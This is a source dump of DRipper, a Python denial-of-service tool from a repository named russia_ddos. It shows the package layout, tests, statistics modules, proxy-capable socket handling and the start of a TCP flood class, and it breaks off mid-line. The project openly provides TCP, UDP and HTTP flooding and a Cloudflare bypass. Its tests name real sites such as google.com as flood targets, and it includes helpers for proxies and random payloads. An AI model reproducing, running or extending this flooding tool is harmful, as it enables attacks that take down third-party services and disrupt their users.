├── ripper ├── __init__.py ├── actions │ ├── __init__.py │ ├── attack_method.py │ ├── tcp_flood.py │ ├── attack.py │ ├── udp_flood.py │ ├── http_bypass.py │ └── http_flood.py ├── context │ ├── __init__.py │ ├── events_journal.py │ ├── target.py │ └── context.py ├── stats │ ├── __init__.py │ ├── packets_stats.py │ ├── ip_info.py │ ├── connection_stats.py │ ├── utils.py │ ├── target_stats_manager.py │ └── context_stats_manager.py ├── assets │ └── headers.txt ├── headers_provider.py ├── duration_manager.py ├── socket_manager.py ├── time_interval_manager.py ├── github_updates_checker.py ├── proxy.py ├── proxy_manager.py ├── arg_parser.py ├── constants.py ├── common.py ├── targets_manager.py ├── health_check_manager.py └── services.py ├── tests ├── __init__.py ├── test_target.py ├── test_stats_ip_info.py ├── test_attack_tcp_flood.py ├── test_attack_udp_flood.py ├── test_github_updates_checker.py ├── test_stats_utils.py ├── test_context.py ├── test_common.py ├── test_targets_manager_packets_stats.py ├── test_attack_http_flood.py └── test_health_check_manager.py ├── _version.py ├── requirements.test.txt ├── requirements.txt ├── DRipper.py ├── docs ├── images │ └── dripper_interface.jpg ├── SetupGuide.md └── UserGuide.md ├── check_python_version.py ├── pytest.ini ├── .coveragerc ├── Dockerfile ├── .github ├── release-notes.sh └── workflows │ └── build.yml ├── setup.py ├── LICENSE ├── .gitignore ├── CHANGELOG.md └── README.md /ripper/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ripper/actions/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ripper/context/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ripper/stats/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /_version.py: -------------------------------------------------------------------------------- 1 | __version__ = "2.6.3" 2 | -------------------------------------------------------------------------------- /requirements.test.txt: -------------------------------------------------------------------------------- 1 | pytest>=7.1.0 2 | pytest-cov>=3.0.0 3 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | rich==12.0.0 2 | pysocks==1.7.1 3 | cloudscraper==1.2.60 4 | psutil==5.9.0 5 | requests>=2.27 6 | -------------------------------------------------------------------------------- /DRipper.py: -------------------------------------------------------------------------------- 1 | import check_python_version 2 | from ripper.services import cli 3 | 4 | if __name__ == '__main__': 5 | cli() 6 | -------------------------------------------------------------------------------- /docs/images/dripper_interface.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/alexmon1989/russia_ddos/HEAD/docs/images/dripper_interface.jpg -------------------------------------------------------------------------------- /check_python_version.py: -------------------------------------------------------------------------------- 1 | from sys import version_info as vi, version 2 | 3 | if vi.major < 3 or (vi.major == 3 and vi.minor < 9): 4 | print('Minimum required Python version to run this script is 3.9!') 5 | print(f'Current version: {version}') 6 | exit(1) 7 | -------------------------------------------------------------------------------- /pytest.ini: -------------------------------------------------------------------------------- 1 | [pytest] 2 | python_files = test_*.py 3 | python_classes = Describe 4 | python_functions = it_* 5 | 6 | testpaths = tests 7 | addopts = 8 | --cov=ripper 9 | --cov-branch 10 | --cov-report=term 11 | ; --cov-report=html:./htmlcov 12 | -------------------------------------------------------------------------------- /ripper/assets/headers.txt: -------------------------------------------------------------------------------- 1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 2 | Accept-Language: en-us,en;q=0.5 3 | Accept-Encoding: gzip,deflate 4 | Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 5 | Keep-Alive: 115 6 | Connection: keep-alive 7 | Content-Type: text/html -------------------------------------------------------------------------------- /.coveragerc: -------------------------------------------------------------------------------- 1 | # .coveragerc to control coverage.py 2 | # https://coverage.readthedocs.io/en/latest/config.html 3 | 4 | [run] 5 | branch = true 6 | source = tests/* 7 | 8 | [paths] 9 | source = ripper 10 | 11 | [html] 12 | show_contexts = True 13 | directory = htmlcov 14 | 15 | [report] 16 | ignore_errors = True 17 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-alpine 2 | ENV PYTHONUNBUFFERED=1 3 | 4 | COPY ./ /app 5 | WORKDIR /app 6 | 7 | RUN apk add --update \ 8 | curl git \ 9 | gcc libc-dev fortify-headers linux-headers && \ 10 | rm -rf /var/cache/apk/* 11 | RUN pip install --upgrade pip -e . 
12 | 
13 | ENTRYPOINT ["dripper"]
14 | 
--------------------------------------------------------------------------------
/tests/test_target.py:
--------------------------------------------------------------------------------
 1 | import pytest as pytest
 2 | 
 3 | from ripper.context.target import Target
 4 | 
 5 | 
 6 | class DescribeTarget:
 7 |     def it_can_validate_connection_status(self):
 8 |         stat = Target(target_uri='http://google.com')
 9 | 
10 |         assert stat.validate_connection(120) is True
11 |         assert stat.validate_connection(-3600) is False
12 | 
--------------------------------------------------------------------------------
/tests/test_stats_ip_info.py:
--------------------------------------------------------------------------------
 1 | import pytest as pytest
 2 | 
 3 | from ripper.stats.ip_info import IpInfo
 4 | 
 5 | 
 6 | class DescribeIpInfo:
 7 |     def it_has_my_ip_changed(self):
 8 |         start_ip = '192.168.0.1'
 9 |         ii = IpInfo(start_ip)
10 | 
11 |         assert not ii.is_ip_changed()
12 |         ii.current_ip = '10.20.0.1'
13 |         assert ii.is_ip_changed()
14 | 
--------------------------------------------------------------------------------
/ripper/actions/attack_method.py:
--------------------------------------------------------------------------------
 1 | class AttackMethod:
 2 |     """Abstract attack method."""
 3 | 
 4 |     @property
 5 |     def name(self):
 6 |         raise NotImplementedError
 7 | 
 8 |     @property
 9 |     def label(self):
10 |         raise NotImplementedError
11 | 
12 |     def __call__(self, *args, **kwargs):
13 |         raise NotImplementedError
14 | 
15 |     def validate(self):
16 |         return True
17 | 
--------------------------------------------------------------------------------
/.github/release-notes.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # -e Exit immediately if a command exits with a non-zero status.
 4 | # -u Treat unset variables as an error when substituting.
 5 | 
 6 | set -eu
 7 | set -o pipefail
 8 | 
 9 | # Get Release notes for the latest release from CHANGELOG.md
10 | # How to use:
11 | # release-notes.sh CHANGELOG.md > ReleaseNotes.md
12 | 
13 | startline=$(($(cat "$1" | grep -nE '^## \[v[0-9]+' | head -n 1 | tail -n 1 | cut -d ":" -f 1) + 1))
14 | finishline=$(($(cat "$1" | grep -nE '^## \[v[0-9]+' | head -n 2 | tail -n 1 | cut -d ":" -f 1) - 1))
15 | changelog=$(sed -n "${startline},${finishline}p" "$1");
16 | 
17 | echo "${changelog}"
18 | 
--------------------------------------------------------------------------------
/tests/test_attack_tcp_flood.py:
--------------------------------------------------------------------------------
 1 | import pytest
 2 | from collections import namedtuple
 3 | 
 4 | from ripper.actions.tcp_flood import TcpFlood
 5 | from ripper.context.context import Context
 6 | 
 7 | Args = namedtuple('Args', 'targets threads_count')
 8 | 
 9 | 
10 | class DescribeTcpFloodAttackMethod:
11 |     def it_has_correct_name(self):
12 |         args = Args(
13 |             targets=['tcp://localhost'],
14 |             threads_count=100,
15 |         )
16 |         ctx = Context(args)
17 |         ctx.__init__(args)
18 |         tcp_flood_am = TcpFlood(ctx.targets_manager.targets[0], ctx)
19 |         assert tcp_flood_am.name == 'TCP Flood'
20 |         assert tcp_flood_am.label == 'tcp-flood'
21 | 
22 |     # TODO Add more tests
23 | 
--------------------------------------------------------------------------------
/tests/test_attack_udp_flood.py:
--------------------------------------------------------------------------------
 1 | import pytest
 2 | from collections import namedtuple
 3 | 
 4 | from ripper.actions.udp_flood import UdpFlood
 5 | from ripper.context.context import Context
 6 | 
 7 | Args = namedtuple('Args', 'targets threads_count')
 8 | 
 9 | 
10 | class DescribeUdpFloodAttackMethod:
11 |     def it_has_correct_name(self):
12 |         args = Args(
13 |             targets=['udp://localhost'],
14 |             threads_count=100,
15 |         )
16 |         ctx = Context(args)
17 |         ctx.__init__(args)
18 |         udp_flood_am = UdpFlood(ctx.targets_manager.targets[0], ctx)
19 |         assert udp_flood_am.name == 'UDP Flood'
20 |         assert udp_flood_am.label == 'udp-flood'
21 | 
22 |     # TODO Add more tests
23 | 
--------------------------------------------------------------------------------
/ripper/headers_provider.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from ripper.common import Singleton, strip_lines, read_file_lines_fs
 3 | 
 4 | 
 5 | def get_headers_dict(raw_headers: list[str]):
 6 |     """Build headers dict for the request."""
 7 |     headers_dict = {}
 8 |     for line in raw_headers:
 9 |         parts = line.split(':', 1)
10 |         headers_dict[parts[0]] = parts[1].strip()
11 | 
12 |     return headers_dict
13 | 
14 | 
15 | class HeadersProvider(metaclass=Singleton):
16 |     def __init__(self):
17 |         self.refresh()
18 | 
19 |     def refresh(self):
20 |         self.user_agents = strip_lines(read_file_lines_fs(os.path.dirname(__file__) + '/assets/user_agents.txt'))
21 |         self.raw_headers = strip_lines(read_file_lines_fs(os.path.dirname(__file__) + '/assets/headers.txt'))
22 |         self.headers = get_headers_dict(self.raw_headers)
23 | 
--------------------------------------------------------------------------------
/ripper/stats/packets_stats.py:
--------------------------------------------------------------------------------
 1 | import time
 2 | import threading
 3 | 
 4 | 
 5 | class PacketsStats:
 6 |     """Class for TCP/UDP statistic collection."""
 7 |     total_sent: int = 0
 8 |     """Total packets sent by TCP/UDP."""
 9 | 
10 |     total_sent_bytes: int = 0
11 |     """Total sent bytes by TCP/UDP connect."""
12 | 
connections_check_time: int = 0 13 | """Connection last check time.""" 14 | _lock: threading.Lock 15 | 16 | def __init__(self): 17 | self._lock = threading.Lock() 18 | self.connections_check_time = time.time_ns() 19 | 20 | def status_sent(self, sent_bytes: int = 0): 21 | """ 22 | Collect sent packets statistic. 23 | :param sent_bytes sent packet size in bytes. 24 | """ 25 | with self._lock: 26 | self.connections_check_time = time.time_ns() 27 | self.total_sent += 1 28 | self.total_sent_bytes += sent_bytes 29 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import check_python_version 2 | from setuptools import setup, find_packages 3 | from ripper.constants import VERSION 4 | 5 | with open('requirements.txt', 'r', encoding='utf-8') as f: 6 | required = f.read().splitlines() 7 | 8 | with open('README.md', 'r', encoding='utf-8') as md: 9 | readme = md.read() 10 | 11 | setup( 12 | name='dripper', 13 | version=VERSION, 14 | long_description=readme, 15 | long_description_content_type='text/markdown', 16 | url='https://github.com/alexmon1989/russia_ddos', 17 | python_requires=">=3.9", 18 | packages=find_packages(exclude=['tests']), 19 | install_requires=required, 20 | package_data={ 21 | 'ripper': [ 22 | 'assets/headers.txt', 23 | 'assets/useragents.txt', 24 | ], 25 | }, 26 | entry_points={ 27 | 'console_scripts': [ 28 | 'dripper=ripper.services:cli', 29 | ], 30 | }, 31 | license='MIT' 32 | ) 33 | -------------------------------------------------------------------------------- /tests/test_github_updates_checker.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import time 3 | 4 | from ripper.github_updates_checker import GithubUpdatesChecker, Version 5 | 6 | 7 | class DescribeGithubUpdatesChecker: 8 | def it_can_read_latest_version(self): 9 | guc = GithubUpdatesChecker() 10 | latest_version = guc.fetch_latest_version() 11 | assert Version('1.0.0') <= latest_version 12 | 13 | def it_can_get_str_version(self): 14 | assert Version('2.3.1').version == '2.3.1' 15 | 16 | def it_can_read_latest_version_on_background(self): 17 | guc = GithubUpdatesChecker() 18 | guc.demon_update_latest_version() 19 | 20 | for _ in range(5): 21 | if guc.latest_version is None: 22 | time.sleep(1) 23 | else: 24 | break 25 | if guc.latest_version is None: 26 | # rate limiter 27 | assert False 28 | assert Version('1.0.0') <= guc.latest_version 29 | -------------------------------------------------------------------------------- /tests/test_stats_utils.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | 3 | from ripper.stats.utils import build_http_codes_distribution, rate_color 4 | 5 | 6 | class DescribeStatsUtils: 7 | @pytest.mark.parametrize('actual, expected', [ 8 | (0, '[red]0[/]'), 9 | (15, '[red]15[/]'), 10 | (35, '[dark_orange]35[/]'), 11 | (55, '[orange1]55[/]'), 12 | (65, '[orange1]65[/]'), 13 | (75, '[yellow4]75[/]'), 14 | (85, '[yellow4]85[/]'), 15 | (95, '[green1]95[/]'), 16 | ]) 17 | def it_applies_different_colors_depending_on_rate(self, actual, expected): 18 | assert rate_color(actual) == expected 19 | 20 | def it_builds_http_codes_distribution(self): 21 | http_status_codes = { 22 | 200: 1, 23 | 300: 2, 24 | 400: 10, 25 | 429: 3, 26 | 500: 2, 27 | } 28 | actual = build_http_codes_distribution(http_status_codes) 29 | assert actual == '200: 6%, 300: 11%, 400: 56%, 
429: 17%, 500: 11%' 30 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 alexmon1989 and contributors. 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ripper/duration_manager.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime, timedelta 2 | import os 3 | import time 4 | from threading import Thread 5 | 6 | 7 | def delayed_os_exit(delay: int): 8 | time.sleep(delay) 9 | os._exit(0) 10 | 11 | 12 | class DurationManager: 13 | _start_time: datetime = None 14 | """Script start time.""" 15 | _duration: timedelta = None 16 | """Attack duration. After this duration script will stop it\'s execution.""" 17 | 18 | def __init__(self, duration_seconds: int = None): 19 | if duration_seconds is not None: 20 | self._duration = timedelta(0, duration_seconds) 21 | 22 | def start_countdown(self): 23 | if self._duration is not None: 24 | self._start_time = datetime.now() 25 | Thread(target=delayed_os_exit, args=[self._duration.total_seconds()]).start() 26 | 27 | @property 28 | def finish_time(self) -> datetime: 29 | if self._duration is None: 30 | return None 31 | return self._start_time + self._duration 32 | 33 | @property 34 | def duration(self) -> timedelta: 35 | return self._duration 36 | 37 | @property 38 | def remaining_duration(self) -> timedelta: 39 | if self._duration is None: 40 | return None 41 | return self.finish_time - datetime.now() 42 | -------------------------------------------------------------------------------- /ripper/stats/ip_info.py: -------------------------------------------------------------------------------- 1 | from ripper.constants import DEFAULT_CURRENT_IP_VALUE 2 | from ripper.common import get_country_by_ipv4 3 | 4 | 5 | class IpInfo: 6 | """All the info about IP addresses and Geo info.""" 7 | country: str = None 8 | """Country code based on your public IPv4 address.""" 9 | start_ip: str = None 10 | """My IPv4 address within script starting.""" 11 | current_ip: str = None 12 | """My current IPv4 address. 
It can be changed during script run.""" 13 | 14 | def __init__(self, ip: str): 15 | self.start_ip = ip 16 | self.current_ip = self.start_ip 17 | self.country = get_country_by_ipv4(self.start_ip) 18 | 19 | @property 20 | def ip_masked(self) -> str: 21 | """ 22 | Get my initial IPv4 address with masked octets. 23 | 24 | 127.0.0.1 -> 127.***.***.*** 25 | """ 26 | parts = self.start_ip.split('.') 27 | if not parts[0].isdigit(): 28 | return DEFAULT_CURRENT_IP_VALUE 29 | 30 | if len(parts) > 1 and parts[0].isdigit(): 31 | return f'{parts[0]}.***.***.***' 32 | else: 33 | return parts[0] 34 | 35 | # TODO make property 36 | def is_ip_changed(self) -> bool: 37 | """:return: True is start ip doesn't equal to current ip""" 38 | return self.start_ip != self.current_ip 39 | -------------------------------------------------------------------------------- /ripper/stats/connection_stats.py: -------------------------------------------------------------------------------- 1 | from threading import Lock 2 | 3 | 4 | class ConnectionStats: 5 | """Class for Connection statistic""" 6 | success_prev: int = 0 7 | """Total connections to HOST with Success status (previous state)""" 8 | success: int = 0 9 | """Total connections to HOST with Success status""" 10 | failed: int = 0 11 | """Total connections to HOST with Failed status.""" 12 | last_check_time: int = 0 13 | """Last check connection time.""" 14 | in_progress: bool = False 15 | """Connection state used for checking liveness of Socket.""" 16 | is_connected: bool = False 17 | _lock: Lock = None 18 | 19 | def __init__(self): 20 | self._lock = Lock() 21 | 22 | def get_success_rate(self) -> int: 23 | """Calculate Success Rate for connection.""" 24 | if self.success == 0: 25 | return 0 26 | 27 | return int(self.success / (self.success + self.failed) * 100) 28 | 29 | def sync_success(self): 30 | """Sync previous success state with current success state.""" 31 | self.success_prev = self.success 32 | 33 | def set_state_in_progress(self): 34 | """Set connection State - in progress.""" 35 | self.in_progress = True 36 | 37 | def set_state_is_connected(self): 38 | """Set connection State - is connected.""" 39 | self.in_progress = False 40 | self.is_connected = True 41 | 42 | def status_success(self): 43 | """Collect successful connections.""" 44 | self.success += 1 45 | 46 | def status_failed(self): 47 | """Collect failed connections.""" 48 | self.failed += 1 49 | -------------------------------------------------------------------------------- /ripper/stats/utils.py: -------------------------------------------------------------------------------- 1 | from ripper.constants import BADGE_WARN, BADGE_INFO, BADGE_ERROR 2 | 3 | 4 | def badge(message: str, badge_template: str) -> str: 5 | """Create color badge with message using template.""" 6 | return badge_template.format(message=message) 7 | 8 | 9 | def badge_info(message: str) -> str: 10 | return badge(message, BADGE_INFO) 11 | 12 | 13 | def badge_warn(message: str) -> str: 14 | return badge(message, BADGE_WARN) 15 | 16 | 17 | def badge_error(message: str) -> str: 18 | return badge(message, BADGE_ERROR) 19 | 20 | 21 | def rate_color(rate: int, units: str = '') -> str: 22 | """ 23 | Get color schema for percentage value. 24 | Color schema looks like red-yellow-green scale for values 0-50-100. 
25 | """ 26 | color = '[red]' 27 | if 30 > rate > 20: 28 | color = '[orange_red1]' 29 | if 50 > rate > 30: 30 | color = '[dark_orange]' 31 | if 70 > rate > 50: 32 | color = '[orange1]' 33 | if 90 > rate > 70: 34 | color = '[yellow4]' 35 | if rate >= 90: 36 | color = '[green1]' 37 | 38 | return f'{color}{rate}{units}[/]' 39 | 40 | 41 | def build_http_codes_distribution(http_codes_counter) -> str: 42 | codes_distribution = [] 43 | total = sum(http_codes_counter.values()) 44 | if not total: 45 | return '...detecting' 46 | for code in http_codes_counter.keys(): 47 | count = http_codes_counter[code] 48 | percent = round(count * 100 / total) 49 | codes_distribution.append(f'{code}: {percent}%') 50 | return ', '.join(codes_distribution) 51 | 52 | 53 | class Row: 54 | def __init__(self, label: str, value: str = '', visible: bool = True, end_section: bool = False): 55 | self.label = str(label) 56 | self.value = str(value) 57 | self.visible = visible 58 | self.end_section = end_section 59 | -------------------------------------------------------------------------------- /ripper/socket_manager.py: -------------------------------------------------------------------------------- 1 | import socks 2 | from socket import socket, AF_INET, SOCK_DGRAM, SOCK_STREAM, SOL_TCP, IPPROTO_TCP, TCP_NODELAY 3 | 4 | from ripper.proxy import Proxy 5 | 6 | 7 | class SocketManager: 8 | """Manager for creating and closing sockets.""" 9 | 10 | _socket: socket = None 11 | """Shared socket.""" 12 | socket_timeout: int = None 13 | """Timeout for socket connection is seconds.""" 14 | 15 | def __init__(self, socket_timeout: int = None): 16 | self.socket_timeout = socket_timeout 17 | 18 | def create_udp_socket(self) -> socket: 19 | """Creates udp socket.""" 20 | # There is issues with UDP protocol via PySock library 21 | udp_socket = socket(AF_INET, SOCK_DGRAM) 22 | udp_socket.settimeout(self.socket_timeout) if self.socket_timeout is not None else 0 23 | 24 | return udp_socket 25 | 26 | def create_tcp_socket(self, proxy: Proxy = None) -> socket: 27 | """Returns tcp socket.""" 28 | tcp_socket = socks.socksocket(AF_INET, SOCK_STREAM, SOL_TCP) 29 | 30 | proxy.decorate_socket(tcp_socket) if proxy is not None else 0 31 | 32 | tcp_socket.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) 33 | tcp_socket.settimeout(self.socket_timeout) if self.socket_timeout is not None else 0 34 | 35 | return tcp_socket 36 | 37 | def get_udp_socket(self) -> socket: 38 | """Returns shared UDP socket.""" 39 | if self._socket is None: 40 | self._socket = self.create_udp_socket() 41 | 42 | return self._socket 43 | 44 | def get_tcp_socket(self, proxy: Proxy = None) -> socket: 45 | """Returns shared TCP socket.""" 46 | if self._socket is None: 47 | self._socket = self.create_tcp_socket(proxy) 48 | 49 | return self._socket 50 | 51 | def close_socket(self) -> bool: 52 | """Closes udp socket if it exists.""" 53 | if self._socket is not None: 54 | self._socket.close() 55 | self._socket = None 56 | return True 57 | return False 58 | -------------------------------------------------------------------------------- /ripper/time_interval_manager.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime, timedelta 2 | from collections import defaultdict 3 | 4 | from ripper.common import Singleton, s2ns 5 | 6 | 7 | class TimeIntervalManager(metaclass=Singleton): 8 | _timer_bucket: dict[str, datetime] = None 9 | """Internal stopwatch.""" 10 | _start_time: datetime = None 11 | """Script start time.""" 12 | 13 | def 
__init__(self): 14 | self._start_time = datetime.now() 15 | self._timer_bucket = defaultdict(dict[str, datetime]) 16 | 17 | @property 18 | def start_time(self) -> datetime: 19 | return self._start_time 20 | 21 | @property 22 | def execution_duration(self) -> timedelta: 23 | return datetime.now() - self._start_time 24 | 25 | @property 26 | def start_time_ns(self) -> int: 27 | """Get start time in nanoseconds.""" 28 | if not self._start_time: 29 | return 0 30 | return s2ns(self._start_time.timestamp()) 31 | 32 | def _get_key_name(self, bucket: str = None) -> str: 33 | if bucket: 34 | return bucket 35 | return '__stopwatch__' 36 | 37 | def check_timer_elapsed(self, sec: int, bucket: str = None) -> bool: 38 | """ 39 | Check if time in seconds elapsed from last check. 40 | :param sec: Amount of seconds which needs to check. 41 | :param bucket: Bucket name to track specific timer. 42 | :return: True if specified seconds elapsed, False - if not elapsed. 43 | """ 44 | key = self._get_key_name(bucket) 45 | delta = self.get_timer_seconds(bucket=key) 46 | if int(delta) < sec: 47 | return False 48 | else: 49 | self._timer_bucket[key] = datetime.now() 50 | return True 51 | 52 | def get_timer_seconds(self, bucket: str = None) -> int: 53 | key = self._get_key_name(bucket) 54 | if key not in self._timer_bucket: 55 | return int(datetime.now().timestamp()) 56 | 57 | return int((datetime.now() - self._timer_bucket[bucket]).total_seconds()) 58 | -------------------------------------------------------------------------------- /tests/test_context.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime, timedelta 2 | from collections import namedtuple 3 | import time 4 | import pytest as pytest 5 | 6 | from ripper.context.context import Context 7 | 8 | Args = namedtuple('Args', 'targets threads_count') 9 | 10 | 11 | class DescribeContext: 12 | args: Args = Args( 13 | targets=['https://httpbin.org'], 14 | threads_count=100, 15 | ) 16 | 17 | @pytest.mark.parametrize('actual_ip, expected_result', [ 18 | ('127.0.0.1', '127.***.***.***'), 19 | ('42.199.100.200', '42.***.***.***'), 20 | ('42', '42'), 21 | # ('...detecting', '...detecting') 22 | ]) 23 | def it_can_get_ip_masked(self, actual_ip, expected_result): 24 | context = Context(self.args) 25 | context.__init__(self.args) 26 | context.myIpInfo.start_ip = actual_ip 27 | assert context.myIpInfo.ip_masked == expected_result 28 | 29 | def it_checks_time_interval(self): 30 | context = Context(self.args) 31 | context.__init__(self.args) 32 | last_2mins = datetime.now() - timedelta(minutes=2) 33 | context.time_interval_manager._start_time = last_2mins 34 | 35 | assert datetime.now() > context.time_interval_manager.start_time 36 | assert context.time_interval_manager.check_timer_elapsed(5) is True 37 | assert context.time_interval_manager.check_timer_elapsed(5) is False 38 | time.sleep(2) 39 | assert context.time_interval_manager.check_timer_elapsed(5) is False 40 | assert context.time_interval_manager.check_timer_elapsed(1) is True 41 | 42 | @pytest.mark.parametrize('target_uri, attack_method', [ 43 | ('http://google.com', 'http-flood'), 44 | ('tcp://google.com', 'tcp-flood'), 45 | ('udp://google.com', 'udp-flood'), 46 | ]) 47 | def it_detects_attack_by_target_in_context(self, target_uri, attack_method): 48 | args = Args( 49 | targets=[target_uri], 50 | threads_count=100, 51 | ) 52 | context = Context(args) 53 | # context is singleton now, so it should be reinitialized manually 54 | context.__init__(args) 55 
| assert context.targets_manager.targets[0].attack_method == attack_method 56 | -------------------------------------------------------------------------------- /tests/test_common.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | import time 3 | import random 4 | 5 | from ripper.common import convert_size, detect_cloudflare, generate_fixed_size_random_bytes, generate_random_bytes 6 | 7 | 8 | class DescribeCommonMethods: 9 | @pytest.mark.parametrize('actual, expected', [ 10 | (0, '0.00 B'), 11 | (100, '100.00 B'), 12 | (1024, '1.00 kB'), 13 | (16384096, '15.63 MB'), 14 | (32256798429, '30.04 GB'), 15 | (620832256798429, '564.64 TB'), 16 | (620832256798429256, '551.41 PB'), 17 | ]) 18 | def it_has_convert_size(self, actual, expected): 19 | assert convert_size(actual) == expected 20 | 21 | @pytest.mark.parametrize('actual, units, expected', [ 22 | (1024, 'B/s', '1.00 kB/s'), 23 | (1024, 'Bps', '1.00 kBps'), 24 | (16384096, 'B/s', '15.63 MB/s') 25 | ]) 26 | def it_has_convert_size_with_units(self, actual, units, expected): 27 | assert convert_size(actual, units) == expected 28 | 29 | def it_can_check_cloudflare_protection(self): 30 | assert detect_cloudflare('https://www.thesfmarathon.com') is True 31 | 32 | def it_can_generate_fixed_size_random_sequence(self): 33 | b1 = generate_fixed_size_random_bytes(10) 34 | assert len(b1) == 10 35 | b2 = generate_fixed_size_random_bytes(10) 36 | assert len(b2) == 10 37 | assert b1 == b1 38 | assert b1 != b2 39 | start = time.time() 40 | for _ in range(1000): 41 | generate_fixed_size_random_bytes(65536) 42 | duration = time.time() - start 43 | # 1K packets per second 44 | assert duration < 1 45 | 46 | def it_can_generate_random_bytes(self): 47 | for _ in range(10): 48 | min_len = random.randint(1, 1000) 49 | max_len = min_len + random.randint(1, 1000) 50 | bt = generate_random_bytes(min_len, max_len) 51 | assert max_len >= len(bt) >= min_len 52 | 53 | def it_can_generate_random_bytes_with_empty_length(self): 54 | bt = generate_random_bytes(0, 0) 55 | assert not bt 56 | 57 | def it_can_generate_long_fixed_random_bytes(self): 58 | bt = generate_random_bytes(10000, 10000) 59 | assert len(bt) == 10000 60 | -------------------------------------------------------------------------------- /ripper/github_updates_checker.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib.request 3 | import threading 4 | 5 | from ripper.constants import * 6 | 7 | 8 | class Version: 9 | @staticmethod 10 | def validate(version: str): 11 | parts = version.split('.') 12 | if len(parts) != 3: 13 | return False 14 | for ps in parts: 15 | if not ps.isdigit(): 16 | return False 17 | return True 18 | 19 | _parts: list[int] = None 20 | 21 | def __init__(self, version: str): 22 | if not Version.validate(version): 23 | raise ValueError() 24 | self._parts = [int(ps) for ps in version.split('.')] 25 | 26 | @property 27 | def version(self): 28 | return '.'.join([str(ps) for ps in self._parts]) 29 | 30 | def calc_positional_value(self): 31 | if not self._parts: 32 | return 0 33 | return self._parts[2] + self._parts[1] * 1000 + self._parts[0] * 1000_000 34 | 35 | def __ge__(self, other): 36 | return self.calc_positional_value() >= other.calc_positional_value() 37 | 38 | def __lt__(self, other): 39 | return self.calc_positional_value() < other.calc_positional_value() 40 | 41 | def __eq__(self, other): 42 | return self.calc_positional_value() == 
other.calc_positional_value() 43 | 44 | 45 | class GithubUpdatesChecker: 46 | _owner: str = '' 47 | _repo: str = '' 48 | latest_version: Version = None 49 | 50 | def __init__(self, owner: str = GITHUB_OWNER, repo: str = GITHUB_REPO): 51 | self._owner = owner 52 | self._repo = repo 53 | 54 | def get_request_url(self): 55 | return f'https://raw.githubusercontent.com/{self._owner}/{self._repo}/main/_version.py' 56 | 57 | def fetch_latest_version(self) -> Version: 58 | try: 59 | request = urllib.request.Request(url=self.get_request_url()) 60 | raw: str = urllib.request.urlopen(request).read().decode('utf8') 61 | ver = re.search(r"(\d+\.\d+\.\d+)", raw).group(0) 62 | self.latest_version = Version(ver) 63 | except: 64 | return None 65 | 66 | return self.latest_version 67 | 68 | def demon_update_latest_version(self): 69 | threading.Thread(target=self.fetch_latest_version).start() 70 | -------------------------------------------------------------------------------- /ripper/actions/tcp_flood.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | from contextlib import suppress 3 | from typing import Any 4 | from socks import ProxyError 5 | 6 | from ripper.context.events_journal import EventsJournal 7 | from ripper.context.target import Target 8 | from ripper.common import generate_random_bytes 9 | from ripper.actions.attack_method import AttackMethod 10 | from ripper.proxy import Proxy 11 | 12 | # Forward Reference 13 | Context = 'Context' 14 | 15 | events_journal = EventsJournal() 16 | 17 | 18 | class TcpFlood(AttackMethod): 19 | """TCP Flood method.""" 20 | 21 | name: str = 'TCP Flood' 22 | label: str = 'tcp-flood' 23 | 24 | _sock: socket 25 | _target: Target 26 | _ctx: Context 27 | _proxy: Proxy = None 28 | 29 | def __init__(self, target: Target, context: Context): 30 | self._target = target 31 | self._ctx = context 32 | 33 | def create_connection(self) -> socket: 34 | self._proxy = self._ctx.proxy_manager.get_random_proxy() 35 | conn = self._ctx.sock_manager.create_tcp_socket(self._proxy) 36 | conn.connect(self._target.hostip_port_tuple()) 37 | 38 | return conn 39 | 40 | def __call__(self, *args, **kwargs): 41 | with suppress(Exception), self.create_connection() as tcp_conn: 42 | self._target.stats.connect.status_success() 43 | events_journal.info('Creating new TCP connection...', target=self._target) 44 | while 